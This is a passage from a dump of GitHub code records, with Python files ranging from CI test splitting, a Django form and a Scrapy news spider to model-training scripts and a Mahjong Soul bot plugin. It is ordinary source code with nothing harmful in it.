serve()\n","repo_name":"dongmingli-Ben/email-wizard","sub_path":"smart_parse/parse_server_async.py","file_name":"parse_server_async.py","file_ext":"py","file_size_in_byte":5748,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"1225874811","text":"import functools\nimport json\nimport pathlib\nimport typing\n\nimport clize\nfrom tomlkit import parse\n\n\n\"\"\"\nexample test spec:\n\n[datalens.pytest.unit]\nroot_dir = \"dl_core_tests/\"\ntarget_path = \"unit\"\n\n[datalens.pytest.db_part_1]\nroot_dir = \"dl_core_tests/db/\"\ntarget_path = \"aio caches capabilities common\"\nlabels = [\"fat\"]\n\"\"\"\n\nDEFAULT_MODE = \"base\"\n\n\ndef format_output(name: str, sections: list[tuple[str, str]]) -> str:\n data = [f\"{path}:{target}\" for path, target in sections]\n\n return f\"{name}={json.dumps(data)}\"\n\n\ndef read_package_paths(targets_path: pathlib.Path) -> typing.Generator[str, None, None]:\n with open(targets_path, \"r\") as file:\n data = file.read()\n data = data.strip()\n data = data.replace(\"'\", '\"')\n\n for item in json.loads(data):\n yield item.strip()\n\n\ndef read_pytest_targets(path: pathlib.Path) -> typing.Optional[dict[str, typing.Any]]:\n if not path.is_file():\n print(f\"File {path} not found\")\n raise FileNotFoundError(f\"File {path} not found\")\n\n with open(path, \"r\") as file:\n toml_data = parse(file.read())\n\n return toml_data.get(\"datalens\", {}).get(\"pytest\", {})\n\n\ndef get_package_tests(\n root_path: pathlib.Path,\n package_path: str,\n requested_mode: str,\n) -> typing.Generator[tuple[str, str], None, None]:\n pytest_targets: dict | None = {}\n try:\n pytest_targets = read_pytest_targets(root_path / package_path / \"pyproject.toml\")\n except FileNotFoundError:\n return\n\n if pytest_targets is None:\n return\n\n for section in pytest_targets.keys():\n spec = pytest_targets.get(section, {})\n labels = spec.get(\"labels\", [])\n\n if requested_mode in labels:\n yield package_path, section\n\n\ndef get_default_package_tests(\n root_path: pathlib.Path,\n package_path: str,\n) -> typing.Generator[tuple[str, str], None, None]:\n pytest_targets: dict | None = {}\n try:\n pytest_targets = read_pytest_targets(root_path / package_path / \"pyproject.toml\")\n except FileNotFoundError:\n return\n\n if not pytest_targets or len(pytest_targets) == 0:\n yield package_path, \"__default__\"\n return\n\n for section, spec in pytest_targets.items():\n labels = spec.get(\"labels\", [])\n\n if len(labels) == 0:\n yield package_path, section\n\n\ndef get_tests(\n requested_mode: str,\n root_dir: pathlib.Path,\n test_targets_json_path: pathlib.Path,\n) -> typing.Generator[tuple[str, str], None, None]:\n for package_path in read_package_paths(test_targets_json_path):\n if requested_mode == DEFAULT_MODE:\n yield from get_default_package_tests(root_dir, package_path)\n else:\n yield from get_package_tests(root_dir, package_path, requested_mode)\n\n\ndef split_tests(\n requested_mode: str,\n root_dir: pathlib.Path,\n test_targets_json_path: pathlib.Path,\n) -> None:\n result = list(get_tests(requested_mode, root_dir, test_targets_json_path))\n formatted_output = format_output(f\"split_{requested_mode}\", result)\n print(formatted_output)\n\n\ncmd = functools.partial(clize.run, split_tests)\n\nif __name__ == \"__main__\":\n cmd()\n","repo_name":"datalens-tech/datalens-backend","sub_path":"terrarium/bi_ci/bi_ci/split_pytest_tasks.py","file_name":"split_pytest_tasks.py","file_ext":"py","file_size_in_byte":3173,"program_lang":"python","lang":"en","doc_type":"code","stars":99,"dataset":"github-code","pt":"54"} +{"seq_id":"31116969073","text":"#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# Input line num\nnum = int(input())\n# Input rates\nrates = [int(input()) for i in range(num)]\n\nmaxv = -100000000000\nminv = 100000000000\n\nfor i in range(len(rates)):\n maxv = max(maxv, rates[i] - minv)\n minv = min(minv, rates[i])\n\nprint(maxv)\n","repo_name":"daylight55/learn-program-contest","sub_path":"2_Algorithm_and_Order/ALDS1_1_D.py","file_name":"ALDS1_1_D.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"9967782883","text":"from django import forms\n\nclass FormularioEmpleados(forms.Form):\n\n CARGO=(\n (1,'Lava Platos'),\n (2,'Chef'),\n (3,'Mesero')\n )\n\n nombre=forms.CharField(\n required=True,\n max_length=20,\n label='Nombre del Empleado ',\n widget=forms.TextInput(attrs={'class':'form-control mb-3'})\n )\n apellido=forms.CharField(\n required=False,\n max_length=20,\n widget=forms.TextInput(attrs={'class':'form-control mb-3'})\n )\n telefono=forms.CharField(\n required=True,\n max_length=20,\n widget=forms.NumberInput(attrs={'class':'form-control mb-3'})\n )\n direccion=forms.CharField(\n required=False,\n max_length=20,\n widget=forms.TextInput(attrs={'class':'form-control mb-3'})\n )\n cargo=forms.ChoiceField(\n required=True,\n widget=forms.Select(attrs={'class':'form-select mb-3'}),\n choices=CARGO\n )","repo_name":"alejo1403/trabajo-final","sub_path":"config/web/formularios/formularioEmpleados.py","file_name":"formularioEmpleados.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"5347880039","text":"import numpy as np\n\n\ndef dilated_healpix_map(m):\n \"\"\"\n Dilate a healpix map - every pixel with a neighbour\n that is UNSEEN gets set to unseen as well\n\n Parameters\n ----------\n m: array\n Healpix float map\n\n Returns\n -------\n m2: array\n Matching-sized map with edge pixels UNSEEN\n \"\"\"\n import healpy\n\n npix = m.size\n nside = healpy.npix2nside(npix)\n hit = np.where(m != healpy.UNSEEN)[0]\n neighbours = healpy.get_all_neighbours(nside, hit)\n\n bad = np.any(m[neighbours] == healpy.UNSEEN, axis=0)\n bad_index = hit[bad]\n\n m2 = m.copy()\n m2[bad_index] = healpy.UNSEEN\n return m2\n","repo_name":"LSSTDESC/TXPipe","sub_path":"txpipe/utils/healpix.py","file_name":"healpix.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"54"} +{"seq_id":"36316739131","text":"import threading\nimport time\nclass Sense:\n def __init__(self,BrainP):\n self.bparm = BrainP\n tSense = threading.Thread(target=self.loopSense)\n tSense.start()\n\n def loopSense(self):\n self.bparm.logSenseThread(\"thread started...\")\n last_time = time.clock()\n diffs = []\n while self.bparm.senseLife:\n #register iterations per second\n last_time, diffs, ips = self.bparm.ips(last_time, diffs);\n self.bparm.nimage = ips\n #self.bparm.logSenseThread(\"transmiting...\")\n self.bparm.sight.see()\n #time.sleep(0.5)\n\n","repo_name":"tizon9804/NNRobot","sub_path":"NNRobotUSup/Brain/TSense.py","file_name":"TSense.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"28000539571","text":"tickets = [[\"ICN\", \"SFO\"], [\"ICN\", \"ATL\"], [\"SFO\", \"ATL\"], [\"ATL\", \"ICN\"], [\"ATL\", \"SFO\"]]\n# [['ICN', 'A'], ['A', 'B'], ['A', 'C'], ['C', 'A'], ['B', 'D']]\ndef solution(tickets):\n answer = []\n visited = [False for j in range(len(tickets))]\n\n def dfs(start, result):\n if False not in visited:\n answer.append(result)\n return\n\n for i, ticket in enumerate(tickets):\n if not visited[i] and start == ticket[0]:\n visited[i] = True\n dfs(ticket[1], result + [ticket[1]])\n visited[i] = False\n\n dfs('ICN', ['ICN'])\n\n return sorted(answer)[0]\n\n\nprint(solution(tickets))\n","repo_name":"yxnxj/Algorithms","sub_path":"Programmers/lv3_여행경로/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"38454258864","text":"'''\nCreate data structures.\n~~~~~~~~~~~~~~~~~~~~~~~\n'''\n\n# Import libraries\nimport asyncio\nimport discord\n\nfrom src.core import constants\n\n# Initialize central dict structures to hold:\n## memory queues\nlibrary = {}\n## token counts\ncounter = {}\n## channel locks (for thread safety)\nlocker = {}\n\n'''\nQueue/Counter Creation\n'''\n\nasync def fetch_queue(message: discord.message) -> asyncio.Queue:\n \"\"\"\n Fetch status of message channel's queue in library.\n\n If exists -> return queue.\n Else -> create and return queue.\n \"\"\"\n\n if message.channel.id not in library:\n library[message.channel.id] = asyncio.Queue() \n \n return library[message.channel.id]\n\nasync def fetch_counter(message: discord.message) -> int:\n \"\"\"\n Fetch status of message channel's token counter.\n\n If exists -> return count.\n Else -> create counter and return count.\n \"\"\"\n\n if message.channel.id not in counter:\n counter[message.channel.id] = 0 \n \n return counter[message.channel.id]\n\n'''\nLock Creation\n'''\nasync def fetch_lock(message: discord.message) -> asyncio.Lock:\n \"\"\"\n Fetch status of channel lock.\n If not locked, locks and returns lock.\n \"\"\"\n if message.channel.id not in locker:\n locker[message.channel.id] = asyncio.Lock()\n return locker[message.channel.id]\n\n'''\nTrim Check\n'''\n\nasync def fetch_trim(message: discord.message) -> bool:\n \"\"\"\n Check if trim is required. Returns bool.\n \"\"\"\n return counter[message.channel.id] > (constants.MEM_MAX * constants.MEM_UPPER)\n\n\n\n","repo_name":"praetor29/personalgpt","sub_path":"src/memory/creation.py","file_name":"creation.py","file_ext":"py","file_size_in_byte":1546,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"30913599690","text":"from src.amplification import eval_R, Amplification, get_pfr_prf\r\nimport numpy as np\r\n\r\n\r\ndef eval_E_Ui_brute_force(i: int, A: np.ndarray, E_U0: np.ndarray) -> np.ndarray:\r\n if i == 1:\r\n return A @ E_U0\r\n\r\n return A @ eval_E_Ui_brute_force(i - 1, A, E_U0)\r\n\r\n\r\ndef eval_V_Ui_brute_force(\r\n i: int, A: np.ndarray, V_U0: np.ndarray, E_U0: np.ndarray,\r\n K1: np.ndarray, K2: np.ndarray,\r\n p: float, R: float\r\n) -> np.ndarray:\r\n V_Binomials = pow(1 + p, i-1)*K1 + pow(1 - p, i - 1)*K2\r\n if i == 1:\r\n return A @ V_U0 @ A.T + V_Binomials\r\n\r\n return A @ eval_V_Ui_brute_force(i - 1, A, V_U0, E_U0, K1, K2, p, R) @ A.T + V_Binomials\r\n\r\n\r\np_fr, p_rf = 0.87, 0.92\r\nR = eval_R(p_fr, p_rf)\r\npbar = np.sqrt(p_fr * p_rf)\r\nE_U0 = np.array([3, 4])\r\nV_U0 = np.array([[3, 0], [0, 4]])\r\ncls = Amplification(R, pbar, E_U0, V_U0)\r\nA = np.array([[1, p_rf], [p_fr, 1]])\r\n\r\n\r\ndef infty_norm(err):\r\n return np.max(np.max(err))\r\n\r\n\r\ndef test_A():\r\n assert infty_norm(A - cls.get_A()) < 1e-14, \"A is not correct\"\r\n assert infty_norm(A - cls.get_Atoi(1)) < 1e-14, \"A is not correct\"\r\n assert infty_norm(A@A - cls.get_Atoi(2)) < 1e-14, \"A^2 is not correct\"\r\n\r\n\r\ndef test_A_new():\r\n X = 1/np.sqrt(2)*np.array([[R, R], [1, -1]])\r\n X_inv = 1/(R*np.sqrt(2))*np.array([[1, R], [1, -R]])\r\n L = np.array([[1 + pbar, 0], [0, 1-pbar]])\r\n A_new = X@L@X_inv\r\n assert infty_norm(A_new - cls.get_A()) < 1e-14, \"A is not correct\"\r\n\r\n\r\ndef test_E_Ui(i=5):\r\n error = eval_E_Ui_brute_force(i, A, E_U0) - cls.get_E_Ui(i)\r\n assert infty_norm(error) < 1e-10, \"E Ui not correct\"\r\n\r\n\r\ndef test_V_Ui(i=5):\r\n args = A, V_U0, E_U0, cls.K1, cls.K2, pbar, R\r\n error = eval_V_Ui_brute_force(i, *args) - cls.get_V_Ui(i)\r\n assert infty_norm(error) < 1e-10, \"V Ui not correct\"\r\n\r\n\r\ndef test_EXi_over_EYi():\r\n R = 0.9\r\n pbar = 0.85\r\n l1 = 1 + pbar\r\n l2 = 1 - pbar\r\n\r\n i = np.array((list(range(5))))\r\n\r\n for (EX0, EY0) in [(10, 10), (10, 0), (0, 10)]:\r\n a = EX0 + R*EY0\r\n b = EX0 - R*EY0\r\n kls = Amplification(R, pbar, np.array([EX0, EY0]), np.random.random((2, 2)))\r\n EXi = a/2*l1**i + b/2*l2**i\r\n EYi = a/2/R*l1**i - b/2/R*l2**i\r\n indices = EYi > 0\r\n val1 = EXi[indices]/EYi[indices]\r\n val2 = kls.get_EXi_over_EYi(i)\r\n error = val1 - val2[indices]\r\n assert infty_norm(error) < 1e-10, \"EXi/EYi not correct!\"","repo_name":"usnistgov/bias-uq-pcr","sub_path":"test/test_amplification.py","file_name":"test_amplification.py","file_ext":"py","file_size_in_byte":2425,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"54"} +{"seq_id":"27573456410","text":"#!/usr/bin/env python\n\nimport sys\nimport SimpleITK as sitk\n\n# verify that we have the correct number of arguments\nif ( len( sys.argv ) != 5 ):\n sys.stderr.write( \"Usage: prog inputFile outputFile replaceValue upperThreshold\\n\" )\n exit( 1 )\n \n# copy the arguments in to variables\ninputFileName = sys.argv[1]\noutputFileName = sys.argv[2]\nreplaceValue = int( sys.argv[3] )\nupperThreshold = float( sys.argv[4] )\n\n# Read the file into an sitkImage\nimage = sitk.ReadImage( inputFileName )\n\n# Threshold the value [0,2), results in values inside the range 1, 0 otherwise\nboundary = sitk.BinaryThreshold( image, 0, upperThreshold, 1, 0 )\n\nboundary = sitk.BinaryMorphologicalClosing( boundary, 1 )\n\n# Remove any label pixel not connected to the boarder\nboundary = sitk.BinaryGrindPeak( boundary )\n\n\n\nboundary = sitk.Cast( boundary, image.GetPixelIDValue() )\n\n# Multiply, the input image by not the boarder.\n# This will multiply the image by 0 or 1, where 0 is the\n# boarder. Making the board 0\nimage = image * ~boundary\n\n# add the replace value to the pixel on the board\nimage = image + ( boundary * replaceValue )\n\n# sitk.Show( image )\n","repo_name":"paniwani/SimpleITK","sub_path":"Examples/BoarderSegmentation.py","file_name":"BoarderSegmentation.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"38206372613","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait as W\nfrom selenium.webdriver.support import expected_conditions as E\nfrom selenium.webdriver import ActionChains as A\n\nimport pyautogui as P\nimport time\n\n\nexec_path=r\"C:\\Users\\NASA7\\Downloads\\chromedriver_win32 (4)\\chromedriver.exe\"\nURL1=r\"https://inderpsingh.blogspot.com/2014/08/demowebapp_24.html\"\nURL2=r\"https://crossbrowsertesting.github.io/drag-and-drop\"\nheadling_css_locator=\".post-body>div:nth-child(1)>div:nth-child(1)>form:nth-child(1)>h3:nth-child(1)\"\ndistance_id_locator=\"distance\"\ndraggable_id_locator=\"draggable\"\ndroppable_id_locator=\"droppable\"\nwait_time_out=15\ndriver=webdriver.Chrome(executable_path=exec_path)\nwait_variable=W(driver, wait_time_out)\ndriver.get(URL1)\nheadling_element=wait_variable.until(E.presence_of_element_located((By.CSS_SELECTOR,headling_css_locator)))\ndistance_element=wait_variable.until(E.presence_of_element_located((By.ID,distance_id_locator)))\na=A(driver)\na.double_click(headling_element)\na.move_to_element_with_offset(distance_element,0,0)\na.click_and_hold(distance_element)\na.release()\na.send_keys(\"1000\")\na.perform()\n","repo_name":"stepstep3/PycharmProjects4","sub_path":"untitled5/curs 8.1 MOUSE ACTIONS.py","file_name":"curs 8.1 MOUSE ACTIONS.py","file_ext":"py","file_size_in_byte":1196,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"29642224991","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom scrapy.spiders import CrawlSpider, Rule\nfrom scrapy.linkextractors import LinkExtractor\nfrom news_scrapy.items import News\nfrom urllib.parse import urljoin\nfrom scrapy_redis.spiders import RedisCrawlSpider\n\nclass IfengNewsSpider(RedisCrawlSpider):\n\tname = 'ifeng_news'\n\tallowed_domains = ['ifeng.com']\n\n\trules=(Rule(LinkExtractor(allow=('[0-9]+\\.shtml'),deny=('house'),\n\t\trestrict_xpaths=('//a')),\n\tcallback=\"parse_item\",follow=False),\n\t# Rule(LinkExtractor(allow=('list\\.shtml'),\n\t\t# restrict_xpaths=('//ul[contains(@class,\"clearfix\")]')),follow=False),\n\t)\n\n\tdef parse_item(self,response):\n\t\tnews=News()\n\t\ttitle=response.xpath('//h1[contains(@id,\"artical_topic\")]/text()')\n\t\tif title is None or len(title)==0:\n\t\t\treturn\n\t\tnews[\"title\"]=title[0].extract().encode('utf-8')\n\n\t\tpics=response.xpath('//p[contains(@class,\"detailPic\")]/img/@src')\n\t\tif pics is not None and len(pics)>0:\n\t\t\tnews[\"picture\"]=pics.extract()[0];\n\t\t\tpictureInfo=response.xpath('//p[contains(@class,\"picIntro\")]/text()')\n\t\t\tif pictureInfo is not None and len(pictureInfo)>0:\n\t\t\t\tpictureInfo=pictureInfo.extract()\n\t\t\t\tif pictureInfo is not None and len(pictureInfo)>0:\n\t\t\t\t\tnews[\"picture_info\"]=pictureInfo[0].encode('utf-8')\n\t\t\t\telse:\n\t\t\t\t\tnews[\"picture_info\"]=\"Null\"\n\t\t\telse:\n\t\t\t\tnews[\"picture_info\"]=\"Null\"\n\t\telse:\n\t\t\tnews[\"picture\"]=\"Null\"\n\t\t\tnews[\"picture_info\"]=\"Null\"\n\n\t\tcontent=response.xpath('//div[contains(@id,\"main_content\")]/p/text()')\n\t\tif content is None or len(content)==0:\n\t\t\treturn\n\t\telse:\n\t\t\tnews[\"content\"]=\"\\n\".join(content.extract()).encode('utf-8')\n\n\t\tsource=response.xpath('//span[contains(@itemprop,\"publisher\")]/span/a/text()')\n\t\tif source is None or len(source)==0:\n\t\t\treturn\n\t\telse:\n\t\t\tnews[\"source\"]=''.join(source.extract()).encode('utf-8')\n\n\t\ttime=response.xpath('//span[contains(@itemprop,\"datePublished\")]/text()')\n\t\tif time is None or len(time)==0:\n\t\t\treturn\n\t\telse:\n\t\t\tnews[\"time\"]=''.join(time.extract()).encode('utf-8')\n\n\t\tnews[\"url\"]=response.url\n\n\t\tnewstype=response.xpath('//div[contains(@class,\"theLogo\")]/div/a/text()')\n\t\tif newstype is None or len(newstype)==0:\n\t\t\treturn\n\t\telse:\n\t\t\tnews[\"news_type\"]=newstype[0].extract().encode('utf-8')\n\n\t\tyield news\n","repo_name":"Unintelligibility/Reality-Spider","sub_path":"news_scrapy/news_scrapy/spiders/ifeng_news_spider.py","file_name":"ifeng_news_spider.py","file_ext":"py","file_size_in_byte":2208,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73342151203","text":"import torch\nimport torch.optim as optim\nimport numpy as np\nfrom pathlib import Path\nfrom sklearn.model_selection import KFold\nimport math \nimport kornia\n\nfrom utils.train import (\n seed_all,\n set_study,\n set_model,\n get_calculated_means_stds_per_fold, \n get_patch_lists, \n get_loaders, \n save_checkpoint,\n train_epoch,\n validate_epoch,\n)\nfrom utils.parser import create_train_parser\n\n\ndef objective(trial):\n epochs_no_improve:int = 0\n kfold = KFold(n_splits=num_folds, shuffle=False)\n loss_total = np.ones(num_folds)*99999\n epochs = np.ones(num_folds)*0\n img_list, msk_list = get_patch_lists(\n data_path=data_path, \n subset=\"trainval\")\n for fold, (train_ids, val_ids) in enumerate(kfold.split(img_list)):\n train_img_dir = [img_list[i] for i in train_ids]\n train_msk_dir = [msk_list[i] for i in train_ids]\n valid_img_dir = [img_list[i] for i in val_ids]\n valid_msk_dir = [msk_list[i] for i in val_ids]\n epochs_no_improve = 0\n\n model = set_model(architecture=architecture, encoder_name=encoder_name, pretrained=pretrained, b_bilinear=b_bilinear, replace_stride_with_dilation=replace_stride_with_dilation, num_classes=3).to(device=device)\n \n loss_fn = kornia.losses.DiceLoss()\n lr = trial.suggest_loguniform(\"lr\", lr_ranges[0], lr_ranges[1])\n print(f\"suggested LR: {lr}\")\n reduce_factor = trial.suggest_int(\"lr_factor\", int(lr_factor_ranges[0]*10), int(lr_factor_ranges[1]*10), step=int(lr_factor_ranges[2]*10))\n reduce_factor = reduce_factor*0.1\n optimizer = optim.Adam(model.parameters(), lr = lr)\n scheduler = optim.lr_scheduler.ReduceLROnPlateau(optimizer, factor=reduce_factor, min_lr=lr_ranges[0], patience=lr_scheduler_patience)\n means, stds = get_calculated_means_stds_per_fold(fold)\n train_loader, valid_loader = get_loaders(\n train_img_dir = train_img_dir,\n train_msk_dir = train_msk_dir,\n valid_img_dir = valid_img_dir, \n valid_msk_dir = valid_msk_dir,\n mean = means,\n std = stds,\n batch_size = args.batch_size,\n num_workers = num_workers,\n pin_memory = False,\n )\n scaler = torch.cuda.amp.GradScaler()\n for epoch in range(max_epochs):\n train_loss = train_epoch(\n train_loader, \n model, \n optimizer, \n loss_fn, \n scaler, \n cur_epoch=epoch,\n trial_number=trial.number,\n fold=fold,\n )\n checkpoint = {\n \"state_dict\": model.state_dict(),\n \"optimizer\":optimizer.state_dict(),\n }\n \n valid_loss = validate_epoch(\n valid_loader, \n model, \n cur_epoch=epoch, \n trial_number=trial.number,\n fold=fold,\n )\n scheduler.step(valid_loss)\n \n if valid_loss < loss_total[fold]:\n loss_total[fold] = valid_loss\n if b_save_checkpoint:\n save_checkpoint(checkpoint, filename=f\"{str(model_path)}/{architecture}_{encoder_name}_dil{int(replace_stride_with_dilation)}_bilin{int(b_bilinear)}_pre{int(pretrained)}.pth.tar\")\n else:\n epochs_no_improve+=1\n # sometimes it can happen, that valid_loss is nan --> cannot save nan to database, so we need to change it\n if math.isnan(valid_loss):\n valid_loss = 99999\n \n if epochs_no_improve >= es_patience:\n print(f\"Early Stopping on epoch {epoch}\")\n epochs[fold]=epoch\n break\n\n trial.set_user_attr('Valid loss per fold', list(loss_total))\n trial.set_user_attr('root path', root_path)\n trial.set_user_attr('architecture', architecture)\n trial.set_user_attr('encoder_name', encoder_name)\n trial.set_user_attr('batch_size', batch_size)\n trial.set_user_attr('b_bilinear', b_bilinear)\n trial.set_user_attr('pretrained', pretrained)\n trial.set_user_attr('replace_stride', replace_stride_with_dilation)\n trial.set_user_attr('final_epoch', list(epochs))\n trial.set_user_attr('lr_scheduler_patience', lr_scheduler_patience)\n print(f\"Validation loss per fold: {loss_total}\") \n return np.mean(loss_total)\n\n\n\nif __name__ == \"__main__\":\n args = create_train_parser()\n run_prefix:str = args.run_prefix\n b_clean_study:bool = args.b_clean_study\n b_save_checkpoint:bool = args.save_checkpoint\n pretrained:bool = args.pretrained\n b_bilinear:bool = args.b_bilinear\n replace_stride_with_dilation:bool = args.replace_stride_with_dilation\n encoder_name:str = args.encoder_name\n architecture:str = args.architecture\n lr_ranges = [args.lr_min, args.lr_max]\n\n if args.db_name == \"\":\n db_name:str = f\"{run_prefix}_{architecture}_{encoder_name}_dil{int(replace_stride_with_dilation)}_bilin{int(b_bilinear)}_pre{int(pretrained)}\"\n else:\n db_name = args.db_name\n if args.study_name == \"\":\n study_name:str = f\"{architecture}_{encoder_name}_dil{int(replace_stride_with_dilation)}_bilin{int(b_bilinear)}_pre{int(pretrained)}\"\n else:\n study_name = args.study_name\n root_path: str = args.root_path\n data_path = Path(root_path) / \"data\" \n num_folds:int = args.n_folds\n batch_size:int = args.batch_size\n n_trials:int = args.n_trials\n\n lr_factor_ranges = [0.1, 0.9, 0.1]\n max_epochs:int = 100\n es_patience:int = 10\n lr_scheduler_patience:int = 5\n seed:int = args.seed\n\n device: str = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n num_workers: int = 2\n\n seed_all(seed=seed)\n\n # Create Paths\n model_path = Path(f'{root_path}/models/')\n model_path.mkdir(parents=True, exist_ok=True)\n result_path = Path(f'{root_path}/results/')\n result_path.mkdir(parents=True, exist_ok=True)\n\n study = set_study(db_name=db_name, study_name=study_name, root_path=root_path, seed=seed, b_clean_study=b_clean_study)\n\n study.optimize(lambda trial: objective(trial), n_trials=n_trials)","repo_name":"grimmlab/UAVWeedSegmentation","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6218,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"54"} +{"seq_id":"5145002934","text":"import nltk\nimport pandas as pd\nimport re\nfrom gensim.models import Word2Vec\nfrom nltk import pos_tag\nfrom nltk.corpus import stopwords\nfrom nltk.stem import PorterStemmer, WordNetLemmatizer\n\nnltk.download('wordnet')\n\nstop_words = set(stopwords.words('english'))\nstemmer = PorterStemmer()\nlemmatizer = WordNetLemmatizer()\n\nresumeFile1 = '~/Projects/hau/csstudy/resume-screening-and-classification/demo-set/resumes/2482_edited.xlsx'\nresumeDf1 = pd.read_excel(resumeFile1)\n\nresumeFile2 = '~/Projects/hau/csstudy/resume-screening-and-classification/demo-set/resumes/resumes.xlsx'\nresumeDf2 = pd.read_excel(resumeFile2)\n\njdFile = '~/Projects/hau/csstudy/resume-screening-and-classification/demo-set/job-descriptions/glassdoor_jobdescriptions.xlsx'\njdDf = pd.read_excel(jdFile)\n\ndef preprocessing2(text):\n text = re.sub('http\\S+\\s*', ' ', text)\n text = re.sub('RT|cc', ' ', text)\n text = re.sub('#\\S+', '', text)\n text = re.sub('@\\S+', ' ', text)\n text = re.sub('[%s]' % re.escape(\"\"\"!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~\"\"\"), ' ', text)\n text = re.sub(r'[^\\x00-\\x7f]',r' ', text)\n text = re.sub('\\s+', ' ', text)\n words = text.split()\n words = [word for word in words if word.lower() not in stop_words]\n # words = [stemmer.stem(word.lower()) for word in words if word.lower() not in stop_words]\n tagged_words = pos_tag(words)\n lemmatized_words = []\n for word, pos in tagged_words:\n wordnet_pos = get_wordnet_pos(pos)\n lemmatized_words.append(lemmatizer.lemmatize(word.lower(), wordnet_pos))\n return lemmatized_words\n # return words\n\ndef get_wordnet_pos(tag):\n if tag.startswith('J'):\n return 'a' # Adjective\n elif tag.startswith('N'):\n return 'n' # Noun\n elif tag.startswith('R'):\n return 'r' # Adverb\n elif tag.startswith('V'):\n return 'v' # Verb\n else:\n return 'n'\n\nresumeDf1['cleanedResume'] = resumeDf1['Resume'].apply(lambda x: preprocessing2(x))\nresumeDf2['cleanedResume'] = resumeDf2['Resume'].apply(lambda x: preprocessing2(x))\njdDf['cleanedDetails'] = jdDf['Details'].apply(lambda x: preprocessing2(x))\n\ncorpus = resumeDf1['cleanedResume'].tolist() + resumeDf2['cleanedResume'].tolist() + jdDf['cleanedDetails'].tolist()\n\nmodel = Word2Vec(sentences=corpus, vector_size=300, window=5, min_count=1, sg=1)\n\n# model.save('word2vec.model')\nmodel_path = 'word2vec.bin'\nmodel.wv.save_word2vec_format(model_path, binary=True)\n\nvocabulary_size = len(model.wv.key_to_index)\nprint(\"Vocabulary Size:\", vocabulary_size)\n\ntarget_word = 'mechanic'\nsimilar_words = model.wv.most_similar(target_word, topn=10)\n\nfor word, score in similar_words:\n print(word, score)\n","repo_name":"chelscelis/resume-screening-and-classification","sub_path":"word2vec_train.py","file_name":"word2vec_train.py","file_ext":"py","file_size_in_byte":2665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"6269248148","text":"# coding=utf-8\nimport hoshino\nimport asyncio\n\nfrom hoshino import Service, priv, config\nfrom hoshino.typing import CQEvent\n\nforward_msg_exchange = config.FORWARD_MSG_EXCHANGE\nforward_msg_name = config.FORWARD_MSG_NAME\nforward_msg_uid = config.FORWARD_MSG_UID\nrecall_msg_set = config.RECALL_MSG_SET\nRECALL_MSG_TIME = config.RECALL_MSG_TIME\n\nsv_help = '''\n由于牌谱屋不收录铜之间以及银之间牌谱,故所有数据仅统计2019年11月29日后金场及以上场次的数据\nPS:暂时只支持四麻对局的查询\n'''.strip()\n\nmajsoul_help_1 = '''\n查询指令:\n- [雀魂信息/雀魂查询 昵称] 查询该ID的雀魂基本对局数据(包含金场以上所有)\n- [三麻信息/三麻查询 昵称] 查询该ID��魂三麻的基本对局数据(包含金场以上所有)\n- [雀魂信息/雀魂查询 (金/金之间/金场/玉/王座) 昵称] 查询该ID在金/玉/王座之间的详细数据\n- [三麻信息/三麻查询 (金/金之间/金场/玉/王座) 昵称] 查询该ID在三麻金/玉/王座之间的详细数据\n- [雀魂牌谱 昵称] 查询该ID下最近五场的对局信息\n- [三麻牌谱 昵称] 查询该ID下最近五场的三麻对局信息\n'''.strip()\n\nmajsoul_help_2 = '''\n对局订阅指令:\n- [雀魂订阅 昵称] 订阅该昵称在金之间以上的四麻对局信息 \n- [三麻订阅 昵称] 订阅该昵称在金之间以上的三麻对局信息 \n- [(取消/关闭)雀魂订阅 昵称] 将该昵称在本群的订阅暂时关闭 \n- [(取消/关闭)三麻订阅 昵称] 将该昵称在本群的三麻订阅暂时关闭 \n- [开启雀魂订阅 昵称] 将该昵称在本群的订阅开启 \n- [开启三麻订阅 昵称] 将该昵称在本群的三麻订阅开启 \n- [删除雀魂订阅 昵称] 将该昵称在本群的订阅删除\n- [删除三麻订阅 昵称] 将该昵称在本群的三麻订阅删除\n- [雀魂订阅状态] 查询本群的雀魂订阅信息的开启状态 \n- [三麻订阅状态] 查询本群的雀魂订阅信息的开启状态 \n'''.strip()\n\nsv = Service(\n name = '雀魂查询', #功能名\n use_priv = priv.NORMAL, #使用权限 \n manage_priv = priv.ADMIN, #管理权限\n visible = True, #False隐藏\n enable_on_default = True, #是否默认启用\n bundle = '查询', #属于哪一类\n help_ = sv_help #帮助文本\n )\n\ndef gen_bundle_manual(bundle_name, service_list, gid):\n manual = [bundle_name]\n service_list = sorted(service_list, key=lambda s: s.name)\n for sv in service_list:\n if sv.visible:\n spit_line = '=' * max(0, 18 